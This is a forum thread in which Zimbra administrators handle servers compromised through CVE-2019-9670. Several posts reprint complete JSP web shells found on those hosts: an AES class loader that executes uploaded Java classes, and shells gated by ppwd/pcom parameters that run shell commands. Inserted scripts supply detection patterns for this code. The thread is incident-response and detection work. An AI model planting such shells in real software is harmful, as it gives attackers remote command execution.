CVE-2019-9670 being actively exploited

Drake
Posts: 8
Joined: Tue May 28, 2019 8:52 am

Re: CVE-2019-9670 being actively exploited

Postby Drake » Fri May 31, 2019 7:28 am

Hi guys
Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be.

<< /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("f037KfDS-uNcpGsM45mGqbjjKhqUUng7_fY2U9-85Gs")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

>>

<</opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbraAdmin/public/jsp/Alert.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("Hok8gxZFafGORRLCiowY_vpqNappusQV8agmQkI7wKk")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

>>

Thank you.

With Regards


elby
Posts: 14
Joined: Tue May 28, 2019 7:37 am

Re: CVE-2019-9670 being actively exploited

Postby elby » Fri May 31, 2019 7:40 am

The problem appeared again. Do you have these folders?


/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp

with:
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java

and

/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/CryptCore_jsp.class
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/CryptCore_jsp.java
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/Docs_jsp.class
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/Docs_jsp.java

@Drake, yes, the files you mentioned are infected.
docat
Posts: 2
Joined: Wed May 29, 2019 9:01 am

Re: CVE-2019-9670 being actively exploited

Postby docat » Fri May 31, 2019 8:05 am

I noticed that 2 days in a row at 9:18 (my local time) sed is started. It works about 10-20 seconds and after that zmswath appears and all of this.
Can this be used somehow?
erefer@gmail.com
Posts: 3
Joined: Tue May 28, 2019 12:41 pm

Re: CVE-2019-9670 being actively exploited

Postby erefer@gmail.com » Fri May 31, 2019 8:11 am

Drake wrote:Hi guys
Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be.

<< /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("f037KfDS-uNcpGsM45mGqbjjKhqUUng7_fY2U9-85Gs")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

>>
Thank you.

With Regards


Yes, it's malicious code. And your version confirms that the key used by the hacker is not fixed.

Basically, this code allows the hacker to upload an encrypted Java class and to execute code in it.
elby
Posts: 14
Joined: Tue May 28, 2019 7:37 am

Re: CVE-2019-9670 being actively exploited

Postby elby » Fri May 31, 2019 8:25 am

Help me with this plz :

/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java:if("lMIAb3JS-s7dPUDkAZA-O8INcT4vQWNQ_oILtGOGZLE".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}


Do you have these files at all?

/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java
Drake
Posts: 8
Joined: Tue May 28, 2019 8:52 am

Re: CVE-2019-9670 being actively exploited

Postby Drake » Fri May 31, 2019 8:48 am

erefer@gmail.com wrote:
Drake wrote:Hi guys
Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be.

<< /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("f037KfDS-uNcpGsM45mGqbjjKhqUUng7_fY2U9-85Gs")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

>>
Thank you.

With Regards


Yes, it's malicious code. And your version confirms that the key used by the hacker is not fixed.

Basically, this code allows the hacker to upload an encrypted Java class and to execute code in it.


erefer, thanks for the reply. Regarding the key used by the hacker, do I need to do something else than just deleting these two files?

Thank you in advance
With Regards
zimbraxtc
Posts: 7
Joined: Mon May 27, 2019 6:13 pm

Re: CVE-2019-9670 being actively exploited

Postby zimbraxtc » Fri May 31, 2019 12:24 pm

elby wrote:Help me with this plz :

/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java:if("lMIAb3JS-s7dPUDkAZA-O8INcT4vQWNQ_oILtGOGZLE".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}


Do you have these files at all?

/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java


I have not.

/opt/zimbra/mailboxd/work/zimbraAdmin/ exists but is empty.

Running 8.6
mqaroush
Posts: 42
Joined: Sun Aug 03, 2014 4:31 am

Re: CVE-2019-9670 being actively exploited

Postby mqaroush » Fri May 31, 2019 9:31 pm

Can you check the following code found in the corresponding files and tell if it is malicious.
[root@we ~]# cat /opt/zimbra/jetty/webapps/zimbra/public/Ajax.jsp
<% if ( "nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA"
.equals( request.getParameter( "p" +
"pwd" ) ) )
{ java.io.InputStream AwDiE = Runtime.getRuntime()
.exec
( new
String[]
{
"/" + "bin/sh"
, "-c"
, request.getParameter(
"p" + "com"
) } )
.getInputStream()
; int MqP
= -1
;
byte[] NtRe
=
new
byte[ 22 ]
; out.print(
"<"
+
"pre>"
) ;
while(
( MqP = AwDiE.read( NtRe
) ) != -1 ) { out.print( new String( NtRe,
0, MqP ) ) ; }
out.print( "</" + "pre>" ) ;
} %>

Also , what is the meaning of this line :
[root@we~]# cat /opt/zimbra/log/access_log.2019-05-30 | grep pyth
218.103.121.116 - - [30/May/2019:00:14:20 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 400 345 "-" "python-requests/2.21.0" 5
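The log line mqaroush asks about is a POST to the Autodiscover servlet (the servlet in which the XXE behind CVE-2019-9670 lives) from a client identifying itself as python-requests, i.e. a script rather than a browser or mail client; the 400 response says the request was rejected, not that it succeeded. The following is an added example, not Zimbra code and not anything posted in this thread: a small triage script for /opt/zimbra/log/access_log that parses each line and flags scripted clients, POSTs to Autodiscover, and requests carrying the ppwd/pcom parameter names used by the password-gated shell quoted above. The log lines embedded in it are constructed (TEST-NET addresses), and the indicator names are this example's own.

```python
"""Triage a Zimbra access_log for the request patterns discussed in this thread.

Added example, not Zimbra code. The log lines below are constructed (TEST-NET
addresses); the indicator names are this example's own choices.
"""
import re
import sys
from collections import Counter

# Combined log format; Zimbra's trailing response-time field is left unmatched.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Scripting clients rather than browsers or mail apps.
SCRIPTED_UA = re.compile(r"python-requests|python-urllib|curl/|Go-http-client|libwww-perl", re.I)

# Query-string names used by the password-gated shell quoted in this thread.
SHELL_PARAMS = re.compile(r"[?&](ppwd|pcom)=")


def parse_line(line: str):
    """Return the parsed fields of one access_log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def reasons_for(rec: dict) -> list[str]:
    """Name every reason a parsed request deserves a look."""
    out = []
    if SCRIPTED_UA.search(rec["ua"]):
        out.append("scripted_client")
    # The Autodiscover servlet is the entry point for CVE-2019-9670; a POST
    # there from a scripted client is the probe worth correlating with JSP
    # files appearing under webapps/ or work/ shortly afterwards.
    if rec["method"] == "POST" and rec["path"].lower().startswith("/autodiscover/"):
        out.append("autodiscover_post")
    if SHELL_PARAMS.search(rec["path"]):
        out.append("webshell_params")
    return out


def triage(lines) -> list[tuple[str, str, list[str]]]:
    """Return (ip, path, reasons) for every line that trips at least one indicator."""
    flagged = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        why = reasons_for(rec)
        if why:
            flagged.append((rec["ip"], rec["path"], why))
    return flagged


def top_sources(lines) -> list[tuple[str, int]]:
    """Count flagged requests per source IP, most active first."""
    return Counter(ip for ip, _, _ in triage(lines)).most_common()


# Constructed sample lines (not from any real server).
SAMPLE_LOG = """\
203.0.113.7 - - [30/May/2019:00:14:20 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 400 345 "-" "python-requests/2.21.0" 5
198.51.100.22 - - [30/May/2019:00:15:02 +0000] "GET /public/Ajax.jsp?ppwd=PLACEHOLDER&pcom=PLACEHOLDER HTTP/1.1" 200 118 "-" "Mozilla/5.0" 12
192.0.2.44 - alice [30/May/2019:08:03:11 +0000] "POST /service/soap/NoOpRequest HTTP/1.1" 200 512 "https://mail.example.test/" "Mozilla/5.0 (X11; Linux x86_64)" 3
203.0.113.7 - - [30/May/2019:09:18:00 +0000] "GET /Autodiscover/Autodiscover.xml HTTP/1.1" 404 0 "-" "python-requests/2.21.0" 2
"""

if __name__ == "__main__":
    # Usage: python triage_access_log.py /opt/zimbra/log/access_log.2019-05-30
    lines = open(sys.argv[1]).read().splitlines() if len(sys.argv) > 1 else SAMPLE_LOG.splitlines()
    for ip, path, why in triage(lines):
        print(f"{ip} {path} -> {', '.join(why)}")
    print("per-source totals:", top_sources(lines))
```

A single 400 from a scripted client is not proof of compromise, but a burst of Autodiscover POSTs from one address followed by requests to a JSP that carries ppwd/pcom is the sequence this thread describes, and the per-source count makes that address easy to hand to the firewall rule bizonek describes later.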
bizonek
Posts: 7
Joined: Sat Sep 13, 2014 2:36 am

Re: CVE-2019-9670 being actively exploited

Postby bizonek » Sat Jun 01, 2019 11:59 am

Hi

Maybe this will help someone.
#0 - I did all steps suggested in this post and all from https://lorenzo.mile.si/zimbra-cve-2019-9670-being-actively-exploited-how-to-clean-the-zmcat-infection/961/ and I still had this problem, so I did:
#1 - find all corrupted files containing:
grep "if.*equals(" -R /opt/zimbra/mailboxd/

and remove code starting from %if ("HASSSSHHHHH to ; } %
example:
<%
if ( "N67nqYcLWDOojFzFNvPCSAPQKg7VysUYXclEM1BZBIQ" .equals(
.....
QokFueMBi ) ) ;
} out.print(
"</p"
+ "re>"
) ; } %>


If the file is binary, remove a whole file.

#2 - block all those IP
    141.98.80.47
    71.6.146.130
    158.69.195.70
    85.234.126.0/24
    185.211.245.0/24
    89.248.0.0/16
    46.3.96.2

#3 - Apply patch one more time (with an argument -force)

#4 - reboot the system (required to stop all connections or kill all active connections)

After this, I have almost a week without any problems.
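bizonek's step #1 searches for `if.*equals(` across the mailboxd tree, and erefer's answer above explains what the other shell variant does (decrypting and defining a class sent in the request body). The script below is an added example, not Zimbra code and not anything posted in this thread: it walks a directory of .jsp/.java files and reports which of the indicators visible in the shells quoted by Drake, elby and mqaroush each file contains. It first collapses whitespace and folds `"p" + "com"` style literal concatenation, so the line-split, concatenated form mqaroush posted is matched the same way as the one-line form. The sample contents embedded in it are constructed (the key is a placeholder), and the indicator names are this example's own.

```python
"""Scan JSP/Java sources for the web-shell indicators quoted in this thread.

Added example, not Zimbra code. Indicator names and sample contents are this
example's own; nothing here is copied from a real host.
"""
import re
import sys
from pathlib import Path

# Indicators visible in the shells quoted in the thread: a password-gated
# Runtime.exec() driven by "ppwd"/"pcom" parameters, and the AES-decrypting
# class loader (defineClass + session-held key + sun.misc.BASE64Decoder).
INDICATORS = {
    "shell_exec":          re.compile(r"Runtime\.getRuntime\(\)\s*\.exec\s*\("),
    "param_command":       re.compile(r'request\.getParameter\(\s*"pcom"\s*\)'),
    "param_password_gate": re.compile(r'request\.getParameter\(\s*"ppwd"\s*\)'),
    "define_class":        re.compile(r"\.defineClass\s*\("),
    "session_aes_key":     re.compile(r"SecretKeySpec\s*\(\s*\(\s*session\.getValue"),
    "sun_base64_decoder":  re.compile(r"sun\.misc\.BASE64Decoder"),
}

# `"a" + "b"` literal concatenation, folded so "p" + "com" reads as "pcom".
_CONCAT = re.compile(r'"([^"\\]*)"\s*\+\s*"([^"\\]*)"')


def normalize(src: str) -> str:
    """Collapse whitespace and fold adjacent string literals.

    The obfuscated shell quoted by mqaroush splits tokens over many lines and
    builds "ppwd"/"pcom" from fragments; a grep for the literal names misses
    it, the folded text does not.
    """
    text = re.sub(r"\s+", " ", src)
    while True:
        folded = _CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', text)
        if folded == text:
            return text
        text = folded


def scan_source(src: str) -> list[str]:
    """Return the names of all indicators present in one source text."""
    text = normalize(src)
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_tree(root: str, suffixes=(".jsp", ".java")) -> dict[str, list[str]]:
    """Walk a tree (e.g. /opt/zimbra/mailboxd or the jetty webapps/work dirs)
    and map each flagged file to the indicators found in it."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix in suffixes:
            found = scan_source(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits


# Constructed samples (not copied from any real server). The second mirrors
# the whitespace-split, concatenated style of the Ajax.jsp quoted above, with
# a placeholder in place of the key.
BENIGN_JSP = '<%@ page contentType="text/html" %><html><body>${greeting}</body></html>'
OBFUSCATED_JSP = """<% if ( "PLACEHOLDER_KEY" .equals( request.getParameter( "p" +
"pwd" ) ) ) { java.io.InputStream s = Runtime.getRuntime()
.exec ( new String[] { "/" + "bin/sh" , "-c" , request.getParameter(
"p" + "com" ) } ) .getInputStream() ; } %>"""

if __name__ == "__main__":
    # Usage: python scan_jsp.py /opt/zimbra/mailboxd
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, found in sorted(scan_tree(root).items()):
        print(f"{path}: {', '.join(found)}")
```

Run it against both the webapps and the work directories named earlier in the thread (the compiled `*_jsp.java` under `work/` is the copy jetty actually executes), and treat any hit as a file to preserve for analysis and then remove, rather than editing the shell out of a file whose legitimate contents you cannot vouch for.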
doses
Posts: 1
Joined: Sun Jun 02, 2019 9:54 am

Re: CVE-2019-9670 being actively exploited

Postby doses » Sun Jun 02, 2019 10:43 am

Hi everyone.

I think it is also worth paying attention to this article:
( https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html#href1 )
